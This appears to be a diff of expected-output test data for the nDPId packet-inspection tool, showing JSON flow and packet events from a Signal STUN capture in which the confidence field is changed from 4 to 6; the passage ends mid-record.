00554{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":302,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1636901998660,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":92,"thread_ts_msec":1636901998660,"pkt":"mt9Y+uvcCL6sCxduCABFIABw9kpAAOQRNE8jnnrTwKgMqQ2WlFIAXFMAAQEAQCESpEJTRld4cWpibUxkeFoAIAAIAAEPi3w9RVEAAQAIAAEumV0v4ROAKwAIAAENliOeetOALAAIAAEAUCOeetOAIgAETm9uZYAoAASDCssQ"} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":302,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1636901998644,"flow_last_seen":1636901998660,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":84,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1636901998660,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.122.211","src_port":37970,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.SignalVoip","breed":"Acceptable","category":"VoIP"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":302,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1636901998644,"flow_last_seen":1636901998660,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":84,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1636901998660,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.122.211","src_port":37970,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.SignalVoip","breed":"Acceptable","category":"VoIP"}} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":305,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1636901998663,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1636901998663,"pkt":"CL6sCxdumt9Y+uvcCABFAAA43E9AAEAR8qLAqAypI55605RSAbsAJLdQAAMACCESpEJxcXQycnUyTXoya28AGQAEEQAAAA=="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":311,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1636901998865,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1636901998865,"pkt":"CL6sCxdumt9Y+uvcCABFAAAwgexAAEARxQLAqAyprP15f7qXS2YAHLUpAAEAACESpEJFRDdhYWpCejZ6NGY="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":312,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1636901998865,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1636901998865,"pkt":"CL6sCxdumt9Y+uvcCABFAAAwge1AAEARxQHAqAyprP15f5RSS2YAHI3jAAEAACESpEJHZko4WW5Ca1ZEVTk="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":313,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":17,"flow_packet_id":3,"flow_last_seen":1636901998885,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1636901998885,"pkt":"CL6sCxdumt9Y+uvcCABFAAAw3FdAAEAR8qLAqAypI55607qXAbsAHB+DAAEAACESpEJDTUpIUUxOenE3VDQ="} -00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":313,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1636901998637,"flow_last_seen":1636901998885,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1636901998885,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.122.211","src_port":47767,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.SignalVoip","breed":"Acceptable","category":"VoIP"}} +00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":313,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1636901998637,"flow_last_seen":1636901998885,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1636901998885,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.122.211","src_port":47767,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"STUN.SignalVoip","breed":"Acceptable","category":"VoIP"}} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":314,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1636901998885,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1636901998885,"pkt":"CL6sCxdumt9Y+uvcCABFAAAw3FhAAEAR8qHAqAypI55605RSAbsAHCWMAAEAACESpEJWNWJyYWFIV0I5bmo="} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":319,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1636901998967,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1636901998967,"pkt":"mt9Y+uvcCL6sCxduCABFAAA8uXcAACUR6Gus\/Xl\/wKgMqUtmlFIAKLt8AQEADCESpEJHZko4WW5Ca1ZEVTkAIAAIAAEPi3w9RVE="} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":320,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1636901998967,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1636901998967,"pkt":"mt9Y+uvcCL6sCxduCABFgAA8OUIAACYRZyGs\/Xl\/wKgMqUtmupcAKOLDAQEADCESpEJFRDdhYWpCejZ6NGYAIAAIAAEPinw9RVE="} -00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":326,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1636901998637,"flow_last_seen":1636901999417,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1636901999417,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.122.211","src_port":37970,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":326,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1636901998637,"flow_last_seen":1636901999417,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1636901999417,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.122.211","src_port":37970,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"STUN.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":329,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1636902000024,"flow_last_seen":1636902000024,"flow_idle_time":200000,"flow_min_l4_payload_len":96,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1636902000024,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"18.195.131.143","src_port":47767,"dst_port":54054,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00576{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":329,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1636902000024,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":138,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":138,"pkt_l4_len":104,"thread_ts_msec":1636902000024,"pkt":"CL6sCxdumt9Y+uvcCABFAAB8d+5AAEARXt\/AqAypEsODj7qX0yYAaAl7AAEATCESpEJCeElWSlVyQXpFMWUABgAJMUVaczo3a3NzAAAAwFcABAADAAqAKgAINhoW4DAHa9AAJAAEbn8e\/wAIABTJ3jNA\/lTtI\/cIgWHSZfc\/Jdi3xoAoAAQAuGXB"} -00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":329,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1636902000024,"flow_last_seen":1636902000024,"flow_idle_time":200000,"flow_min_l4_payload_len":96,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1636902000024,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"18.195.131.143","src_port":47767,"dst_port":54054,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.SignalVoip","breed":"Acceptable","category":"VoIP"}} +00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":329,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1636902000024,"flow_last_seen":1636902000024,"flow_idle_time":200000,"flow_min_l4_payload_len":96,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1636902000024,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"18.195.131.143","src_port":47767,"dst_port":54054,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"STUN.SignalVoip","breed":"Acceptable","category":"VoIP"}} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":344,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1636902000073,"flow_last_seen":1636902000073,"flow_idle_time":200000,"flow_min_l4_payload_len":96,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1636902000073,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"18.195.131.143","src_port":47767,"dst_port":61498,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00573{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":344,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1636902000073,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":138,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":138,"pkt_l4_len":104,"thread_ts_msec":1636902000073,"pkt":"CL6sCxdumt9Y+uvcCABFAAB8d\/NAAEARXtrAqAypEsODj7qX8DoAaE2WAAEATCESpEI3OHB2NXh3VHhSY2IABgAJMUVaczo3a3NzAAAAwFcABAADAAqAKgAINhoW4DAHa9AAJAAEbn8e\/wAIABQCGGRp5dlaWaRPyMCnCJTZLYHOaoAoAATw85Tp"} -00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":344,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1636902000073,"flow_last_seen":1636902000073,"flow_idle_time":200000,"flow_min_l4_payload_len":96,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1636902000073,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"18.195.131.143","src_port":47767,"dst_port":61498,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.SignalVoip","breed":"Acceptable","category":"VoIP"}} +00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":344,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1636902000073,"flow_last_seen":1636902000073,"flow_idle_time":200000,"flow_min_l4_payload_len":96,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1636902000073,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"18.195.131.143","src_port":47767,"dst_port":61498,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"STUN.SignalVoip","breed":"Acceptable","category":"VoIP"}} 00530{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":345,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1636902000102,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":106,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":106,"pkt_l4_len":72,"thread_ts_msec":1636902000102,"pkt":"mt9Y+uvcCL6sCxduCABFSABcw7JAAAYRTPMSw4OPwKgMqdMmupcASMDpAQEALCESpEJCeElWSlVyQXpFMWUAIAAIAAEPinw9RVEACAAUIB3cDwXbxtjdDKqyJ3Jq4xtLsfaAKAAEpnvqQg=="} 00572{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":346,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":22,"flow_packet_id":3,"flow_last_seen":1636902000107,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":138,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":138,"pkt_l4_len":104,"thread_ts_msec":1636902000107,"pkt":"mt9Y+uvcCL6sCxduCABFSAB8w7NAAAYRTNISw4OPwKgMqdMmupcAaK01AAEATCESpEJBbDNpSTF1eStSR1UABgAJN2tzczoxRVpzAAAAwFcABAAAA+eAKQAIiflXHs5q0dMAJAAEbgAg\/wAIABQSmjpLVWLcQ98KImy+h9G3RC6S1IAoAATBitk4"} 00532{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":349,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1636902000142,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":106,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":106,"pkt_l4_len":72,"thread_ts_msec":1636902000142,"pkt":"mt9Y+uvcCL6sCxduCABFAABcw7ZAAAYRTTcSw4OPwKgMqfA6upcASKsWAQEALCESpEI3OHB2NXh3VHhSY2IAIAAIAAEPjnw9RVEACAAUJEyhW79\/NO7EtgfmN47ncd2\/SCyAKAAE6dNIHg=="} 00572{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":350,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":23,"flow_packet_id":3,"flow_last_seen":1636902000142,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":138,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":138,"pkt_l4_len":104,"thread_ts_msec":1636902000142,"pkt":"mt9Y+uvcCL6sCxduCABFAAB8w7dAAAYRTRYSw4OPwKgMqfA6upcAaP5PAAEATCESpEIwbFM2UjdmdjFzOTMABgAJN2tzczoxRVpzAAAAwFcABAADA4SAKQAIiflXHs5q0dMAJAAEbn8g\/wAIABT+u0FmMYg2qxKb1bY78Qe06uM1KoAoAAQrkPMA"} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":460,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1636901956930,"flow_last_seen":1636901987908,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":120,"flow_tot_l4_payload_len":1648,"flow_avg_l4_payload_len":74,"midstream":0,"thread_ts_msec":1636902021384,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.183.167","src_port":39950,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.SignalVoip","breed":"Acceptable","category":"VoIP"}} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":460,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1636901998644,"flow_last_seen":1636902021381,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":1520,"flow_avg_l4_payload_len":76,"midstream":0,"thread_ts_msec":1636902021384,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.122.211","src_port":37970,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.SignalVoip","breed":"Acceptable","category":"VoIP"}} -00837{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":460,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1636901956899,"flow_last_seen":1636901980718,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":384,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1636902021384,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.183.167","src_port":43068,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"STUN.AmazonAWS","breed":"Acceptable","category":"Cloud"}} -00829{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":460,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1636901936065,"flow_last_seen":1636901939886,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":240,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1636902021384,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.183.167","src_port":47204,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.AmazonAWS","breed":"Acceptable","category":"Cloud"}} -00832{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":460,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1636902000024,"flow_last_seen":1636902000208,"flow_idle_time":200000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":104,"flow_tot_l4_payload_len":488,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":1636902021384,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"18.195.131.143","src_port":47767,"dst_port":54054,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.SignalVoip","breed":"Acceptable","category":"VoIP"}} -00833{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":460,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1636901956900,"flow_last_seen":1636901978278,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1636902021384,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"172.253.121.127","src_port":43068,"dst_port":19302,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.AmazonAWS","breed":"Acceptable","category":"Cloud"}} -00665{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":460,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1636901936040,"flow_last_seen":1636901936667,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":104,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1636902021384,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"172.253.121.127","src_port":47204,"dst_port":19302,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.GoogleHangoutDuo","breed":"Acceptable","category":"VoIP"}} +00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":460,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1636901956930,"flow_last_seen":1636901987908,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":120,"flow_tot_l4_payload_len":1648,"flow_avg_l4_payload_len":74,"midstream":0,"thread_ts_msec":1636902021384,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.183.167","src_port":39950,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.SignalVoip","breed":"Acceptable","category":"VoIP"}} +00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":460,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1636901998644,"flow_last_seen":1636902021381,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":1520,"flow_avg_l4_payload_len":76,"midstream":0,"thread_ts_msec":1636902021384,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.122.211","src_port":37970,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.SignalVoip","breed":"Acceptable","category":"VoIP"}} +00837{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":460,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1636901956899,"flow_last_seen":1636901980718,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":384,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1636902021384,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.183.167","src_port":43068,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"5":"DPI (cache)"},"proto":"STUN.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00829{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":460,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1636901936065,"flow_last_seen":1636901939886,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":240,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1636902021384,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.183.167","src_port":47204,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"STUN.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00832{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":460,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1636902000024,"flow_last_seen":1636902000208,"flow_idle_time":200000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":104,"flow_tot_l4_payload_len":488,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":1636902021384,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"18.195.131.143","src_port":47767,"dst_port":54054,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"STUN.SignalVoip","breed":"Acceptable","category":"VoIP"}} +00833{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":460,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1636901956900,"flow_last_seen":1636901978278,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1636902021384,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"172.253.121.127","src_port":43068,"dst_port":19302,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"STUN.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00675{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":460,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1636901936040,"flow_last_seen":1636901936667,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":104,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1636902021384,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"172.253.121.127","src_port":47204,"dst_port":19302,"l4_proto":"udp","ndpi": {"confidence": 